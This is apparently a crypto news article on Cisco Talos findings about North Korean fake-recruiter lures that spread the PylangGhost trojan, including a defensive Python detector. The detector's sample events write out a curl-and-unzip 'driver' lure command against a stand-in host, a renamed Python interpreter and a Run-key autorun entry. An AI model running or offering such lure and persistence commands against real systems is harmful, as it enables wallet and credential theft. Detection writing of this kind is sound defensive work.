North Korean Cybercriminals Impersonate Coinbase Recruiters to Acquire Cryptocurrency Using ‘PylangGhost’ Trojan
North Korean cybercriminals have intensified their focus on cryptocurrency professionals with an advanced new Python-based malware known as PylangGhost.
They utilize intricate fake job interview schemes that impersonate prominent companies, such as Coinbase, Robinhood, and Uniswap, to extract credentials from more than 80 browser extensions and cryptocurrency wallets.
Researchers from Cisco Talos uncovered this recent operation by the notorious “Famous Chollima” threat group.
The attacks mainly target crypto and blockchain professionals in India. Victims are lured to skill-testing websites that look legitimate but end by instructing them to run a command presented as a video-driver install for a fictitious interview recording.
Source: Talos Intelligence
The PylangGhost initiative marks the latest intensification in North Korea’s systematic assault on the cryptocurrency sector, which has resulted in over $1.3 billion in stolen assets across 47 distinct incidents in 2024 alone, according to Chainalysis data.
PylangGhost Trojan: From Fake Interviews to Full System Compromise
The PylangGhost operation employs advanced social engineering strategies, starting with meticulously crafted fake recruiter outreach that targets specific skills in cryptocurrency and blockchain technologies.
Victims receive invitations to skill-testing websites developed using the React framework that closely resemble authentic company assessment platforms.
These sites feature technical questions aimed at validating the target’s professional credentials and creating a realistic interview atmosphere.
The psychological manipulation peaks when candidates complete assessments and are prompted to record video interviews. The site requests camera access through a seemingly harmless button click.
Source: Talos Intelligence
Once camera access has been requested, the site shows platform-specific instructions for installing purported video drivers. The site fingerprints the visitor's browser and serves a copy-and-paste command for the matching shell: PowerShell or the Windows Command Shell for Windows users, Bash for macOS.
Source: Talos Intelligence
The command downloads a ZIP archive containing the PylangGhost modules and a Visual Basic Script. The VBS unpacks a bundled Python library and launches the Trojan by running "nvidia.py" under a renamed Python interpreter.
The malware's functionality extends well beyond credential theft. It establishes persistence by writing an autorun entry to the registry so the RAT launches at every user logon.
PylangGhost generates a unique per-system GUID for its command-and-control communication and carries data-exfiltration modules targeting over 80 browser extensions, including widely used cryptocurrency wallets such as MetaMask, Phantom, Bitski, TronLink, and MultiversX.
The Trojan’s modular architecture allows for remote file upload and download, OS shell access, and extensive browser data collection, including stored credentials, session cookies, and extension data from password managers like 1Password and NordPass.
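The delivery chain and persistence described above give a defender three observable stages: a shell one-liner that fetches and unpacks a ZIP posing as a driver install, a Python interpreter renamed to something innocuous running nvidia.py out of a user-writable directory, and an autorun entry pointing back at that script. The following detector is an added example written for this article, not code from Cisco Talos or from the malware; it runs those three checks over a few constructed Sysmon-style events. The event field names, the file paths, the "update.vbs" script name and the assess.example.test host are assumptions for illustration; only nvidia.py and the registry autorun persistence come from the report.

```python
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]
Finding = Tuple[str, str]  # (rule_id, evidence)

SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "bash", "sh", "zsh"}
PY_ORIGINAL_NAMES = {"python.exe", "python3.exe", "pythonw.exe"}
DOWNLOADER = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|certutil|bitsadmin)\b", re.I)
ZIP_URL = re.compile(r"https?://\S+?\.zip\b", re.I)
UNPACKER = re.compile(r"\b(Expand-Archive|unzip|tar\s+-?x|ExtractToDirectory)\b", re.I)
USER_WRITABLE = re.compile(r"(\\AppData\\|\\Temp\\|%TEMP%|\$env:TEMP|/tmp/|/Users/[^/]+/)", re.I)
SCRIPT_ARG = re.compile(r"\S+\.(py|vbs)\b", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)

# Constructed sample telemetry (not real data). "original_file_name" models the
# PE version-resource name Sysmon reports, which survives renaming the binary.
SAMPLE_EVENTS: List[Event] = [
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "original_file_name": "PowerShell.EXE",
     "cmdline": r'powershell -c "curl https://assess.example.test/driver.zip -o $env:TEMP\driver.zip; Expand-Archive $env:TEMP\driver.zip $env:TEMP\drv"'},
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe", "original_file_name": "wscript.exe",
     "cmdline": r"wscript.exe C:\Users\dev\AppData\Local\Temp\drv\update.vbs"},  # assumed VBS name
    {"type": "process", "image": r"C:\Users\dev\AppData\Local\Temp\drv\nvidia.exe",
     "original_file_name": "python.exe",  # renamed interpreter
     "cmdline": r"C:\Users\dev\AppData\Local\Temp\drv\nvidia.exe C:\Users\dev\AppData\Local\Temp\drv\nvidia.py"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\nvidia",
     "value": r"C:\Users\dev\AppData\Local\Temp\drv\nvidia.exe C:\Users\dev\AppData\Local\Temp\drv\nvidia.py"},
    # Benign noise: a developer's normal Python run and a legitimate Run key.
    {"type": "process", "image": r"C:\Python312\python.exe", "original_file_name": "python.exe",
     "cmdline": r"C:\Python312\python.exe -m pytest tests/"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "value": r'"C:\Users\dev\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    # The macOS variant of the lure: same download-and-unpack shape, served as Bash.
    {"type": "process", "image": "/bin/bash", "original_file_name": "",
     "cmdline": "bash -c 'curl -o /tmp/drv.zip https://assess.example.test/mac/driver.zip && unzip /tmp/drv.zip -d /tmp/drv'"},
]


def basename(path: str) -> str:
    return re.split(r"[\\/]", path.strip('"'))[-1].lower()


def check_process(ev: Event) -> List[Finding]:
    out: List[Finding] = []
    image, cmd = basename(ev["image"]), ev.get("cmdline", "")
    orig = ev.get("original_file_name", "").lower()
    # Rule 1: a shell fetching a ZIP over HTTP(S) and (optionally) unpacking it,
    # the shape of the "video driver" one-liner the interview site hands out.
    zip_hit = ZIP_URL.search(cmd)
    if image in SHELL_IMAGES and DOWNLOADER.search(cmd) and zip_hit:
        stage = "download+unpack" if UNPACKER.search(cmd) else "download"
        out.append(("lure_zip_download", f"{stage}: {zip_hit.group(0)}"))
    # Rule 2: on-disk name of the binary differs from its embedded original name,
    # i.e. a Python interpreter renamed to look like something else.
    if orig in PY_ORIGINAL_NAMES and image not in PY_ORIGINAL_NAMES:
        out.append(("renamed_python", f"{ev['image']} (original {orig})"))
    # Rule 3: a script host or Python running a .py/.vbs out of a user-writable directory.
    script = SCRIPT_ARG.search(cmd)
    if (image in {"wscript.exe", "cscript.exe"} or orig in PY_ORIGINAL_NAMES) \
            and script and USER_WRITABLE.search(cmd):
        out.append(("script_from_user_dir", script.group(0)))
    return out


def check_registry(ev: Event) -> List[Finding]:
    # Rule 4: Run/RunOnce value that launches a script from a user-writable directory.
    key, value = ev["key"], ev.get("value", "")
    if RUN_KEY.search(key) and USER_WRITABLE.search(value) and SCRIPT_ARG.search(value):
        return [("run_key_script_persistence", f"{key} -> {value}")]
    return []


def scan(events: List[Event]) -> List[Tuple[int, str, str]]:
    """Return (event_index, rule_id, evidence) for every rule that fires."""
    hits: List[Tuple[int, str, str]] = []
    for i, ev in enumerate(events):
        checks = check_process(ev) if ev["type"] == "process" else check_registry(ev)
        hits.extend((i, rule, evidence) for rule, evidence in checks)
    return hits


CHAIN = ("lure_zip_download", "renamed_python", "run_key_script_persistence")


def full_chain(hits: List[Tuple[int, str, str]]) -> bool:
    """True only when download, renamed interpreter and autorun persistence all appear;
    any one of them alone is weak evidence, the three together are the described intrusion."""
    seen = {rule for _, rule, _ in hits}
    return all(rule in seen for rule in CHAIN)


if __name__ == "__main__":
    for idx, rule, evidence in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {evidence}")
    print("full chain:", full_chain(scan(SAMPLE_EVENTS)))
```

Rule 2 is the one worth wiring into real telemetry first: renaming python.exe to nvidia.exe defeats name-based allow-lists but not the PE version resource, and the mismatch fires with no signature of the payload at all. The other rules are deliberately broad and are meant to be correlated, as full_chain does, rather than alerted on individually.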
A Global Campaign Threatening Crypto Industry Security
The discovery of PylangGhost is only the visible part of a broad, coordinated North Korean cyber campaign that has put crypto enterprises and professionals at risk globally.
Intelligence agencies from Japan, South Korea, and the United States have documented how North Korean-backed groups, chiefly the infamous Lazarus collective, orchestrated sophisticated operations that led to the theft of at least $659 million through cryptocurrency heists in 2024 alone.
North Korean cyber spies reportedly established fake US firms to deploy malware targeting crypto developers, violating Treasury sanctions.#NorthKorea #CyberSecurity https://t.co/TvCmrspaep
— Cryptonews.com (@cryptonews) April 25, 2025
Recent enforcement actions have unveiled the true extent of North Korean cyber operations. The FBI has seized the domain of BlockNovas LLC, which was utilized to create seemingly legitimate corporate entities and conduct long-term deception campaigns.
The recent $50 million Radiant Capital hack also illustrated the effectiveness of these strategies when North Korean operatives successfully impersonated former contractors and distributed malware-laden PDFs to engineers.
A North Korean hacker posed as a job seeker for an engineering position at Kraken, attempting to infiltrate the exchange’s ranks.#Kraken #CryptoHacker #NorthKoreanHacker https://t.co/IorY67EV3L
— Cryptonews.com (@cryptonews) May 2, 2025
While these tactics remain effective, Kraken’s recent announcement that it identified and stopped a North Korean job applicant indicates that major exchanges are now adopting stronger screening measures to detect infiltration attempts.
Similarly, BitMEX recently executed a counterintelligence operation that revealed significant operational vulnerabilities within the Lazarus Group. This included exposed IP addresses and accessible databases that disclosed the group’s fragmented structure with varying technical capabilities across different cells.
The international response has significantly intensified, with South Korea and the European Union formalizing cybersecurity cooperation agreements specifically aimed at North Korean cryptocurrency operations.
Concurrently, U.S. authorities have broadened forfeiture actions to recover over $7.7 million in crypto assets obtained through networks of covert IT workers.
Japan is preparing to urge G7 nations to initiate a coordinated response against North Korea’s increasing involvement in cryptocurrency theft.#Japan #NorthKorea https://t.co/0WG78wEsx4
— Cryptonews.com (@cryptonews) June 12, 2025
The escalating threat has sparked discussions at the highest levels of international diplomacy, with G7 leaders anticipated to address North Korea’s rising cyberattacks at forthcoming summits as member states seek coordinated strategies to safeguard global financial infrastructure.
The post North Korean Hackers Pose as Coinbase Recruiters to Steal Crypto with ‘PylangGhost’ Trojan appeared first on Cryptonews.